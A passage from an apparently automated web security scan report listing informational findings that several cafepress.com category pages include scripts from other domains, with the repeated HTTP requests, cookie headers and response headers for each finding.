Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59533
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.11. http://www.cafepress.com/+boxers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+boxers

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59426
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.12. http://www.cafepress.com/+bumper-stickers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+bumper-stickers

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59721
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.13. http://www.cafepress.com/+buttons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+buttons

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59616
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.14. http://www.cafepress.com/+calendars previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+calendars

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 57707
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.15. http://www.cafepress.com/+clocks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+clocks

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59318
Date: Sun, 26 Dec 2010 13:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.16. http://www.cafepress.com/+coasters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+coasters

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
